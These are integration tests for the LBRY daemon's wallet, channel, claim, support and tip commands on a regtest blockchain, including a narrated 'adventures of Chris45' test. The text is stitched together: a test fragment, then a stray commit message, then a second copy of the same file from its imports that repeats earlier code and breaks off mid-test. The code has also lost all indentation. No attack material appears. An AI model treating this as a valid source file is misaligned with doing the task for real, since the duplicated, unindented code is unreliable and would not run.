with tempfile.NamedTemporaryFile() as file:
file.write(b'Amazingly Original First Line')
file.write(b'Super plot for the grand novel')
file.write(b'Totally un-cliched ending')
file.write(b'**Audience Gasps**')
file.flush()
claim3 = await self.out(self.daemon.jsonrpc_publish(
'fresh-start', '1.0', file_path=file.name, channel_name='@spam'
))
self.assertTrue(claim3['success'])
await self.confirm_tx(claim3['tx']['txid'])
await self.generate(5)
# He gives the link of his story to all his friends and hopes that this is the much needed break for him
uri = 'lbry://@spam/fresh-start'
# And voila, and bravo and encore! His Best Friend Ramsey read the story and immediately knew this was a hit
# Now to keep this claim winning on the lbry blockchain he immediately supports the claim
tx = await self.out(self.daemon.jsonrpc_claim_new_support(
'fresh-start', claim3['claim_id'], '0.2', account_id=ramsey_account_id
))
await self.confirm_tx(tx['txid'])
# And check if his support showed up
resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
# It obviously did! Because, blockchain baby \O/
self.assertEqual(resolve_result[uri]['claim']['amount'], '1.0')
self.assertEqual(resolve_result[uri]['claim']['effective_amount'], '1.2')
self.assertEqual(resolve_result[uri]['claim']['supports'][0]['amount'], '0.2')
self.assertEqual(resolve_result[uri]['claim']['supports'][0]['txid'], tx['txid'])
await self.generate(5)
# Now he also wanted to support the original creator of the Award Winning Novel
# So he quickly decides to send a tip to him
tx = await self.out(
self.daemon.jsonrpc_claim_tip(claim3['claim_id'], '0.3', account_id=ramsey_account_id))
await self.confirm_tx(tx['txid'])
# And again checks if it went to the just right place
resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
# Which it obviously did. Because....?????
self.assertEqual(resolve_result[uri]['claim']['supports'][1]['amount'], '0.3')
self.assertEqual(resolve_result[uri]['claim']['supports'][1]['txid'], tx['txid'])
await self.generate(5)
# Seeing the ravishing success of his novel Chris adds support to his claim too
tx = await self.out(self.daemon.jsonrpc_claim_new_support('fresh-start', claim3['claim_id'], '0.4'))
await self.confirm_tx(tx['txid'])
# And check if his support showed up
resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
# It did!
self.assertEqual(resolve_result[uri]['claim']['supports'][2]['amount'], '0.4')
self.assertEqual(resolve_result[uri]['claim']['supports'][2]['txid'], tx['txid'])
await self.generate(5)
# Now Ramsey who is a singer by profession, is preparing for his new "gig". He has everything in place for that
# the instruments, the theatre, the ads, everything, EXCEPT lyrics!! He panicked.. But then he remembered
# something, so he un-panicked. He quickly calls up his best bud Chris and requests him to write hit lyrics for
# his song, seeing as his novel had smashed all the records, he was the perfect candidate!
# .......
# Chris agrees.. 17 hours 43 minutes and 14 seconds later, he makes his publish
with tempfile.NamedTemporaryFile() as file:
file.write(b'The Whale amd The Bookmark')
file.write(b'I know right? Totally a hit song')
file.write(b'That\'s what goes around for songs these days anyways')
file.flush()
claim4 = await self.out(self.daemon.jsonrpc_publish(
'hit-song', '1.0', file_path=file.name, channel_id=channel['claim_id']
))
self.assertTrue(claim4['success'])
await self.confirm_tx(claim4['tx']['txid'])
await self.generate(5)
# He sends the link to Ramsey, all happy and proud
uri = 'lbry://@spam/hit-song'
# But sadly Ramsey wasn't so pleased. It was hard for him to tell Chris...
# Chris, though a bit heartbroken, abandoned the claim for now, but instantly started working on new hit lyrics
abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=claim4['tx']['txid'], nout=0, blocking=False))
self.assertTrue(abandon['success'])
await self.confirm_tx(abandon['tx']['txid'])
# He them checks that the claim doesn't resolve anymore.
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertNotIn('claim', response[uri])
class AccountManagement(CommandTestCase):
VERBOSE = False
async def test_performing_account_management_commands(self):
# check initial account
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 1)
# change account name and gap
account_id = response['lbc_regtest'][0]['id']
self.daemon.jsonrpc_account_set(
account_id=account_id, new_name='test account',
receiving_gap=95, receiving_max_uses=96,
change_gap=97, change_max_uses=98
)
response = (await self.daemon.jsonrpc_account_list())['lbc_regtest'][0]
self.assertEqual(response['name'], 'test account')
self.assertEqual(
response['address_generator']['receiving'],
{'gap': 95, 'maximum_uses_per_address': 96}
)
self.assertEqual(
response['address_generator']['change'],
{'gap': 97, 'maximum_uses_per_address': 98}
)
# create another account
await self.daemon.jsonrpc_account_create('second account')
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 2)
self.assertEqual(response['lbc_regtest'][1]['name'], 'second account')
account_id2 = response['lbc_regtest'][1]['id']
# make new account the default
self.daemon.jsonrpc_account_set(account_id=account_id2, default=True)
response = await self.daemon.jsonrpc_account_list(show_seed=True)
self.assertEqual(response['lbc_regtest'][0]['name'], 'second account')
account_seed = response['lbc_regtest'][1]['seed']
# remove account
self.daemon.jsonrpc_account_remove(response['lbc_regtest'][1]['id'])
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 1)
# add account
await self.daemon.jsonrpc_account_add('recreated account', seed=account_seed)
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 2)
self.assertEqual(response['lbc_regtest'][1]['name'], 'recreated account')
# list specific account
response = await self.daemon.jsonrpc_account_list(account_id, include_claims=True)
self.assertEqual(response['name'], 'recreated account')
class ClaimManagement(CommandTestCase):
VERBOSITY = logging.WARN
async def make_claim(self, name='hovercraft', amount='1.0', data=b'hi!', channel_name=None, confirm=True):
with tempfile.NamedTemporaryFile() as file:
file.write(data)
file.flush()
claim = await self.out(self.daemon.jsonrpc_publish(
name, amount, file_path=file.name, channel_name=channel_name
))
self.assertTrue(claim['success'])
if confirm:
await self.on_transaction_dict(claim['tx'])
await self.generate(1)
await self.on_transaction_dict(claim['tx'])
return claim
async def craft_claim(self, name, amount_dewies, claim_dict, address):
# FIXME: this is here mostly because publish has defensive code for situations that happens accidentally
# However, it still happens... So, let's reproduce them.
claim = ClaimDict.load_dict(claim_dict)
address = address or (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
tx = await Transaction.claim(name, claim, amount_dewies, address, [self.account], self.account)
await self.broadcast(tx)
await self.ledger.wait(tx)
await self.generate(1)
await self.ledger.wait(tx)
return tx
async def test_create_update_and_abandon_claim(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
claim = await self.make_claim(amount='2.5') # creates new claim
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['claim_info']), 1)
self.assertEqual(txs[0]['confirmations'], 1)
self.assertEqual(txs[0]['claim_info'][0]['balance_delta'], '-2.5')
self.assertEqual(txs[0]['claim_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['value'], '0.0')
self.assertEqual(txs[0]['fee'], '-0.020107')
self.assertEqual('7.479893', await self.daemon.jsonrpc_account_balance())
await self.make_claim(amount='1.0') # updates previous claim
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['update_info']), 1)
self.assertEqual(txs[0]['update_info'][0]['balance_delta'], '1.5')
self.assertEqual(txs[0]['update_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['value'], '0.0')
self.assertEqual(txs[0]['fee'], '-0.0001985')
self.assertEqual('8.9796945', await self.daemon.jsonrpc_account_balance())
await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['abandon_info']), 1)
self.assertEqual(txs[0]['abandon_info'][0]['balance_delta'], '1.0')
self.assertEqual(txs[0]['abandon_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['value'], '0.0')
self.assertEqual(txs[0]['fee'], '-0.000107')
self.assertEqual('9.9795875', await self.daemon.jsonrpc_account_balance())
async def test_update_claim_holding_address(self):
other_account_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
other_account = self.daemon.get_account_or_error(other_account_id)
other_address = await other_account.receiving.get_or_create_usable_address()
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
# create the initial name claim
claim = await self.make_claim()
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 1)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 0)
tx = await self.daemon.jsonrpc_claim_send_to_address(
claim['claim_id'], other_address
)
await self.ledger.wait(tx)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 0)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 1)
async def test_publishing_checks_all_accounts_for_certificate(self):
account1_id, account1 = self.account.id, self.account
new_account = await self.daemon.jsonrpc_account_create('second account')
account2_id, account2 = new_account['id'], self.daemon.get_account_or_error(new_account['id'])
spam_channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', '1.0'))
self.assertTrue(spam_channel['success'])
await self.confirm_tx(spam_channel['tx']['txid'])
self.assertEqual('8.989893', await self.daemon.jsonrpc_account_balance())
result = await self.out(self.daemon.jsonrpc_wallet_send(
'5.0', await self.daemon.jsonrpc_address_unused(account2_id)
))
await self.confirm_tx(result['txid'])
self.assertEqual('3.989769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
baz_channel = await self.out(self.daemon.jsonrpc_channel_new('@baz', '1.0', account2_id))
self.assertTrue(baz_channel['success'])
await self.confirm_tx(baz_channel['tx']['txid'])
channels = await self.out(self.daemon.jsonrpc_channel_list(account1_id))
self.assertEqual(len(channels), 1)
self.assertEqual(channels[0]['name'], '@spam')
self.assertEqual(channels, await self.out(self.daemon.jsonrpc_channel_list()))
channels = await self.out(self.daemon.jsonrpc_channel_list(account2_id))
self.assertEqual(len(channels), 1)
self.assertEqual(channels[0]['name'], '@baz')
# defaults to using all accounts to lookup channel
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
claim1 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name, channel_name='@baz'
))
self.assertTrue(claim1['success'])
await self.confirm_tx(claim1['tx']['txid'])
# uses only the specific accounts which contains the channel
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
claim1 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name,
channel_name='@baz', channel_account_id=[account2_id]
))
self.assertTrue(claim1['success'])
await self.confirm_tx(claim1['tx']['txid'])
# fails when specifying account which does not contain channel
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
with self.assertRaisesRegex(ValueError, "Couldn't find channel with name '@baz'."):
await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name,
channel_name='@baz', channel_account_id=[account1_id]
))
async def test_updating_claim_includes_claim_value_in_balance_check(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
await self.make_claim(amount='9.0')
self.assertEqual('0.979893', await self.daemon.jsonrpc_account_balance())
# update the same claim
await self.make_claim(amount='9.0')
self.assertEqual('0.9796205', await self.daemon.jsonrpc_account_balance())
# update the claim a second time but use even more funds
await self.make_claim(amount='9.97')
self.assertEqual('0.009348', await self.daemon.jsonrpc_account_balance())
# fails when specifying more than available
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
with self.assertRaisesRegex(
InsufficientFundsError,
"Please lower the bid value, the maximum amount"
" you can specify for this claim is 9.979274."
):
await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '9.98', file_path=file.name
))
async def test_abandoning_claim_at_loss(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
claim = await self.make_claim(amount='0.0001')
self.assertEqual('9.979793', await self.daemon.jsonrpc_account_balance())
await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
self.assertEqual('9.97968399', await self.daemon.jsonrpc_account_balance())
async def test_abandoned_channel_with_signed_claims(self):
channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
claim = await self.make_claim(amount='0.0001', name='on-channel-claim', channel_name='@abc')
self.assertTrue(claim['success'])
abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=channel['tx']['txid'], nout=0, blocking=False))
self.assertTrue(abandon['success'])
channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
# Original channel doesnt exists anymore, so the signature is invalid. For invalid signatures, resolution is
# only possible outside a channel
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@abc/on-channel-claim'))
self.assertNotIn('claim', response['lbry://@abc/on-channel-claim'])
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://on-channel-claim'))
self.assertIn('claim', response['lbry://on-channel-claim'])
self.assertFalse(response['lbry://on-channel-claim']['claim']['signature_is_valid'])
direct_uri = 'lbry://on-channel-claim#' + claim['claim_id']
response = await self.out(self.daemon.jsonrpc_resolve(uri=direct_uri))
self.assertIn('claim', response[direct_uri])
self.assertFalse(response[direct_uri]['claim']['signature_is_valid'])
uri = 'lbry://@abc/on-channel-claim'
# now, claim something on this channel (it will update the invalid claim, but we save and forcefully restore)
original_claim = await self.make_claim(amount='0.00000001', name='on-channel-claim', channel_name='@abc')
self.assertTrue(original_claim['success'])
# resolves normally
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertIn('claim', response[uri])
self.assertTrue(response[uri]['claim']['signature_is_valid'])
# tamper it, invalidating the signature
value = response[uri]['claim']['value'].copy()
value['stream']['metadata']['author'] = 'some troll'
address = response[uri]['claim']['address']
await self.craft_claim('on-channel-claim', 1, value, address)
# it resolves to the now only valid claim under the channel, ignoring the fake one
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertIn('claim', response[uri])
self.assertTrue(response[uri]['claim']['signature_is_valid'])
# ooops! claimed a valid conflict! (this happens on the wild, mostly by accident or race condition)
await self.craft_claim('on-channel-claim', 1, response[uri]['claim']['value'], address)
# it still resolves! but to the older claim
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertIn('claim', response[uri])
self.assertTrue(response[uri]['claim']['signature_is_valid'])
self.assertEqual(response[uri]['claim']['txid'], original_claim['tx']['txid'])
async def test_claim_list_by_channel(self):
self.maxDiff = None
tx = await self.daemon.jsonrpc_account_fund(None, None, '0.001', outputs=100, broadcast=True)
await self.ledger.wait(tx)
await self.generate(1)
await self.ledger.wait(tx)
channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "0.0001"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
# 4 claims per block, 3 blocks. Sorted by height (descending) then claim_id (ascending).
claims = []
for j in range(3):
same_height_claims = []
for k in range(3):
claim = await self.make_claim(amount='0.000001', name=f'c{j}-{k}', channel_name='@abc', confirm=False)
self.assertTrue(claim['success'])
same_height_claims.append(claim['claim_id'])
await self.on_transaction_dict(claim['tx'])
claim = await self.make_claim(amount='0.000001', name=f'c{j}-4', channel_name='@abc', confirm=True)
self.assertTrue(claim['success'])
same_height_claims.append(claim['claim_id'])
same_height_claims.sort(key=lambda x: int(x, 16))
claims = same_height_claims + claims
page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=20, uri='@abc'))
page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
self.assertEqual(page_claim_ids, claims)
page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=6, uri='@abc'))
page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
self.assertEqual(page_claim_ids, claims[:6])
out_of_bounds = await self.out(self.daemon.jsonrpc_claim_list_by_channel(2, page_size=20, uri='@abc'))
self.assertEqual(out_of_bounds['error'], 'claim 20 greater than max 12')
async def test_regular_supports_and_tip_supports(self):
# account2 will be used to send tips and supports to account1
account2_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
# send account2 5 LBC out of the 10 LBC in account1
result = await self.out(self.daemon.jsonrpc_wallet_send(
'5.0', await self.daemon.jsonrpc_address_unused(account2_id)
))
await self.confirm_tx(result['txid'])
# account1 and account2 balances:
self.assertEqual('4.999876', await self.daemon.jsonrpc_account_balance())
self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
# create the claim we'll be tipping and supporting
claim = await self.make_claim()
# account1 and account2 balances:
self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
# send a tip to the claim using account2
tip = await self.out(
self.daemon.jsonrpc_claim_tip(claim['claim_id'], '1.0', account2_id)
)
await self.on_transaction_dict(tip)
await self.generate(1)
await self.on_transaction_dict(tip)
# tips don't affect balance so account1 balance is same but account2 balance went down
self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('3.9998585', await self.daemon.jsonrpc_account_balance(account2_id))
# verify that the incoming tip is marked correctly as is_tip=True in account1
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['support_info']), 1)
self.assertEqual(txs[0]['support_info'][0]['balance_delta'], '1.0')
self.assertEqual(txs[0]['support_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['support_info'][0]['is_tip'], True)
self.assertEqual(txs[0]['value'], '1.0')
self.assertEqual(txs[0]['fee'], '0.0')
# verify that the outgoing tip is marked correctly as is_tip=True in account2
txs2 = await self.out(
self.daemon.jsonrpc_transaction_list(account2_id)
)
self.assertEqual(len(txs2[0]['support_info']), 1)
self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-1.0')
self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs2[0]['support_info'][0]['is_tip'], True)
self.assertEqual(txs2[0]['value'], '-1.0')
self.assertEqual(txs2[0]['fee'], '-0.0001415')
# send a support to the claim using account2
support = await self.out(
self.daemon.jsonrpc_claim_new_support('hovercraft', claim['claim_id'], '2.0', account2_id)
)
await self.on_transaction_dict(support)
await self.generate(1)
await self.on_transaction_dict(support)
# account2 balance went down ~2
self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('1.999717', await self.daemon.jsonrpc_account_balance(account2_id))
# verify that the outgoing support is marked correctly as is_tip=False in account2
txs2 = await self.out(self.daemon.jsonrpc_transaction_list(account2_id))
self.assertEqual(len(txs2[0]['support_info']), 1)
self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-2.0')
self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs2[0]['support_info'][0]['is_tip'], False)
self.assertEqual(txs2[0]['value'], '0.0')
self.assertEqual(txs2[0]['fee'], '-0.0001415')
class TransactionCommandsTestCase(CommandTestCase):
async def test_transaction_show(self):
# local tx
result = await self.out(self.daemon.jsonrpc_wallet_send(
'5.0', await self.daemon.jsonrpc_address_unused(self.account.id)
))
await self.confirm_tx(result['txid'])
tx = await self.daemon.jsonrpc_transaction_show(result['txid'])
self.assertEqual(tx.id, result['txid'])
# someone's tx
change_address = await self.blockchain.get_raw_change_address()
sendtxid = await self.blockchain.send_to_address(change_address, 10)
tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
self.assertEqual(tx.id, sendtxid)
self.assertEqual(tx.height, -2)
await self.generate(1)
tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
self.assertEqual(tx.height, self.ledger.headers.height)
# inexistent
result = await self.daemon.jsonrpc_transaction_show('0'*64)
self.assertFalse(result['success'])
async def test_utxo_release(self):
sendtxid = await self.blockchain.send_to_address(
await self.account.receiving.get_or_create_usable_address(), 1
)
await self.confirm_tx(sendtxid)
await self.assertBalance(self.account, '11.0')
await self.ledger.reserve_outputs(await self.account.get_utxos())
await self.assertBalance(self.account, '0.0')
await self.daemon.jsonrpc_utxo_release()
await self.assertBalance(self.account, '11.0')
fix breaking integration tests after fees changed due to content_type modification
import sys
import json
import tempfile
import logging
from binascii import unhexlify
import twisted.internet
from twisted.internet.asyncioreactor import AsyncioSelectorReactor
from lbrynet.extras.wallet.transaction import Transaction
from lbrynet.p2p.Error import InsufficientFundsError
from lbrynet.schema.claim import ClaimDict
from torba.testcase import IntegrationTestCase
import lbrynet.schema
lbrynet.schema.BLOCKCHAIN_NAME = 'lbrycrd_regtest'
from lbrynet import conf as lbry_conf
from lbrynet.extras.daemon.Daemon import Daemon, jsonrpc_dumps_pretty
from lbrynet.extras.wallet import LbryWalletManager
from lbrynet.extras.daemon.Components import WalletComponent
from lbrynet.extras.daemon.Components import (
DHT_COMPONENT, HASH_ANNOUNCER_COMPONENT, PEER_PROTOCOL_SERVER_COMPONENT,
REFLECTOR_COMPONENT, UPNP_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
)
from lbrynet.extras.daemon.ComponentManager import ComponentManager
class FakeAnalytics:
@property
def is_started(self):
return True
def send_new_channel(self):
pass
def shutdown(self):
pass
def send_claim_action(self, action):
pass
def send_credits_sent(self):
pass
def send_server_startup(self):
pass
class CommandTestCase(IntegrationTestCase):
timeout = 180
MANAGER = LbryWalletManager
VERBOSITY = logging.WARN
async def asyncSetUp(self):
await super().asyncSetUp()
twisted.internet.reactor = sys.modules['twisted.internet.reactor'] = AsyncioSelectorReactor()
logging.getLogger('lbrynet.p2p').setLevel(self.VERBOSITY)
logging.getLogger('lbrynet.daemon').setLevel(self.VERBOSITY)
lbry_conf.settings = None
lbry_conf.initialize_settings(
load_conf_file=False,
data_dir=self.wallet_node.data_path,
wallet_dir=self.wallet_node.data_path,
download_dir=self.wallet_node.data_path
)
lbry_conf.settings['use_upnp'] = False
lbry_conf.settings['reflect_uploads'] = False
lbry_conf.settings['blockchain_name'] = 'lbrycrd_regtest'
lbry_conf.settings['lbryum_servers'] = [('localhost', 50001)]
lbry_conf.settings['known_dht_nodes'] = []
lbry_conf.settings.node_id = None
await self.account.ensure_address_gap()
address = (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
sendtxid = await self.blockchain.send_to_address(address, 10)
await self.confirm_tx(sendtxid)
await self.generate(5)
def wallet_maker(component_manager):
self.wallet_component = WalletComponent(component_manager)
self.wallet_component.wallet_manager = self.manager
self.wallet_component._running = True
return self.wallet_component
skip = [
DHT_COMPONENT, UPNP_COMPONENT, HASH_ANNOUNCER_COMPONENT,
PEER_PROTOCOL_SERVER_COMPONENT, REFLECTOR_COMPONENT, EXCHANGE_RATE_MANAGER_COMPONENT
]
analytics_manager = FakeAnalytics()
self.daemon = Daemon(analytics_manager, ComponentManager(
analytics_manager=analytics_manager,
skip_components=skip, wallet=wallet_maker
))
await self.daemon.setup()
self.daemon.wallet_manager = self.wallet_component.wallet_manager
self.manager.old_db = self.daemon.storage
async def asyncTearDown(self):
await super().asyncTearDown()
self.wallet_component._running = False
await self.daemon.shutdown()
async def confirm_tx(self, txid):
""" Wait for tx to be in mempool, then generate a block, wait for tx to be in a block. """
await self.on_transaction_id(txid)
await self.generate(1)
await self.on_transaction_id(txid)
async def on_transaction_dict(self, tx):
await self.ledger.wait(
self.ledger.transaction_class(unhexlify(tx['hex']))
)
@staticmethod
def get_all_addresses(tx):
addresses = set()
for txi in tx['inputs']:
addresses.add(txi['address'])
for txo in tx['outputs']:
addresses.add(txo['address'])
return list(addresses)
async def generate(self, blocks):
""" Ask lbrycrd to generate some blocks and wait until ledger has them. """
await self.blockchain.generate(blocks)
await self.ledger.on_header.where(self.blockchain.is_expected_block)
async def out(self, awaitable):
""" Converts Daemon API call results (dictionary)
to JSON and then back to a dictionary. """
return json.loads(jsonrpc_dumps_pretty(await awaitable, ledger=self.ledger))['result']
class EpicAdventuresOfChris45(CommandTestCase):
VERBOSITY = logging.WARN
async def test_no_this_is_not_a_test_its_an_adventure(self):
# Chris45 is an avid user of LBRY and this is his story. It's fact and fiction
# and everything in between; it's also the setting of some record setting
# integration tests.
# Chris45 starts everyday by checking his balance.
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '10.0')
# "10 LBC, yippy! I can do a lot with that.", he thinks to himself,
# enthusiastically. But he is hungry so he goes into the kitchen
# to make himself a spamdwich.
# While making the spamdwich he wonders... has anyone on LBRY
# registered the @spam channel yet? "I should do that!" he
# exclaims and goes back to his computer to do just that!
channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', "1.0"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
# Do we have it locally?
channels = await self.out(self.daemon.jsonrpc_channel_list())
self.assertEqual(len(channels), 1)
self.assertEqual(channels[0]['name'], '@spam')
# As the new channel claim travels through the intertubes and makes its
# way into the mempool and then a block and then into the claimtrie,
# Chris doesn't sit idly by: he checks his balance!
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '8.989893')
# He waits for 6 more blocks (confirmations) to make sure the balance has been settled.
await self.generate(6)
result = await self.daemon.jsonrpc_account_balance(confirmations=6)
self.assertEqual(result, '8.989893')
# And is the channel resolvable and empty?
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam'))
self.assertIn('lbry://@spam', response)
self.assertIn('certificate', response['lbry://@spam'])
# "What goes well with spam?" ponders Chris...
# "A hovercraft with eels!" he exclaims.
# "That's what goes great with spam!" he further confirms.
# And so, many hours later, Chris is finished writing his epic story
# about eels driving a hovercraft across the wetlands while eating spam
# and decides it's time to publish it to the @spam channel.
with tempfile.NamedTemporaryFile() as file:
file.write(b'blah blah blah...')
file.write(b'[insert long story about eels driving hovercraft]')
file.write(b'yada yada yada!')
file.write(b'the end')
file.flush()
claim1 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name, channel_id=channel['claim_id']
))
self.assertTrue(claim1['success'])
await self.confirm_tx(claim1['tx']['txid'])
# He quickly checks the unconfirmed balance to make sure everything looks
# correct.
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '7.969786')
# Also checks that his new story can be found on the blockchain before
# giving the link to all his friends.
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
self.assertIn('lbry://@spam/hovercraft', response)
self.assertIn('claim', response['lbry://@spam/hovercraft'])
# He goes to tell everyone about it and in the meantime 5 blocks are confirmed.
await self.generate(5)
# When he comes back he verifies the confirmed balance.
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '7.969786')
# As people start reading his story they discover some typos and notify
# Chris who explains in despair "Oh! Noooooos!" but then remembers
# "No big deal! I can update my claim." And so he updates his claim.
with tempfile.NamedTemporaryFile() as file:
file.write(b'blah blah blah...')
file.write(b'[typo fixing sounds being made]')
file.write(b'yada yada yada!')
file.flush()
claim2 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name, channel_name='@spam'
))
self.assertTrue(claim2['success'])
self.assertEqual(claim2['claim_id'], claim1['claim_id'])
await self.confirm_tx(claim2['tx']['txid'])
# After some soul searching Chris decides that his story needs more
# heart and a better ending. He takes down the story and begins the rewrite.
abandon = await self.out(self.daemon.jsonrpc_claim_abandon(claim1['claim_id'], blocking=False))
self.assertTrue(abandon['success'])
await self.confirm_tx(abandon['tx']['txid'])
# And now checks that the claim doesn't resolve anymore.
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@spam/hovercraft'))
self.assertNotIn('claim', response['lbry://@spam/hovercraft'])
# After abandoning he just waits for his LBCs to be returned to his account
await self.generate(5)
result = await self.daemon.jsonrpc_account_balance()
self.assertEqual(result, '8.9693615')
# Amidst all this Chris receives a call from his friend Ramsey
# who says that it is of utmost urgency that Chris transfer him
# 1 LBC to which Chris readily obliges
ramsey_account_id = (await self.daemon.jsonrpc_account_create("Ramsey"))['id']
ramsey_account = self.daemon.get_account_or_error(ramsey_account_id)
ramsey_address = await self.daemon.jsonrpc_address_unused(ramsey_account_id)
result = await self.out(self.daemon.jsonrpc_wallet_send('1.0', ramsey_address))
self.assertIn("txid", result)
await self.confirm_tx(result['txid'])
# Chris then eagerly waits for 6 confirmations to check his balance and then calls Ramsey to verify whether
# he received it or not
await self.generate(5)
result = await self.daemon.jsonrpc_account_balance()
# Chris' balance was correct
self.assertEqual(result, '7.9692375')
# Ramsey too assured him that he had received the 1 LBC and thanks him
result = await self.daemon.jsonrpc_account_balance(ramsey_account_id)
self.assertEqual(result, '1.0')
# After Chris is done with all the "helping other people" stuff he decides that it's time to
# write a new story and publish it to lbry. All he needed was a fresh start and he came up with:
with tempfile.NamedTemporaryFile() as file:
file.write(b'Amazingly Original First Line')
file.write(b'Super plot for the grand novel')
file.write(b'Totally un-cliched ending')
file.write(b'**Audience Gasps**')
file.flush()
claim3 = await self.out(self.daemon.jsonrpc_publish(
'fresh-start', '1.0', file_path=file.name, channel_name='@spam'
))
self.assertTrue(claim3['success'])
await self.confirm_tx(claim3['tx']['txid'])
await self.generate(5)
# He gives the link of his story to all his friends and hopes that this is the much needed break for him
uri = 'lbry://@spam/fresh-start'
# And voila, and bravo and encore! His Best Friend Ramsey read the story and immediately knew this was a hit
# Now to keep this claim winning on the lbry blockchain he immediately supports the claim
tx = await self.out(self.daemon.jsonrpc_claim_new_support(
'fresh-start', claim3['claim_id'], '0.2', account_id=ramsey_account_id
))
await self.confirm_tx(tx['txid'])
# And check if his support showed up
resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
# It obviously did! Because, blockchain baby \O/
self.assertEqual(resolve_result[uri]['claim']['amount'], '1.0')
self.assertEqual(resolve_result[uri]['claim']['effective_amount'], '1.2')
self.assertEqual(resolve_result[uri]['claim']['supports'][0]['amount'], '0.2')
self.assertEqual(resolve_result[uri]['claim']['supports'][0]['txid'], tx['txid'])
await self.generate(5)
# Now he also wanted to support the original creator of the Award Winning Novel
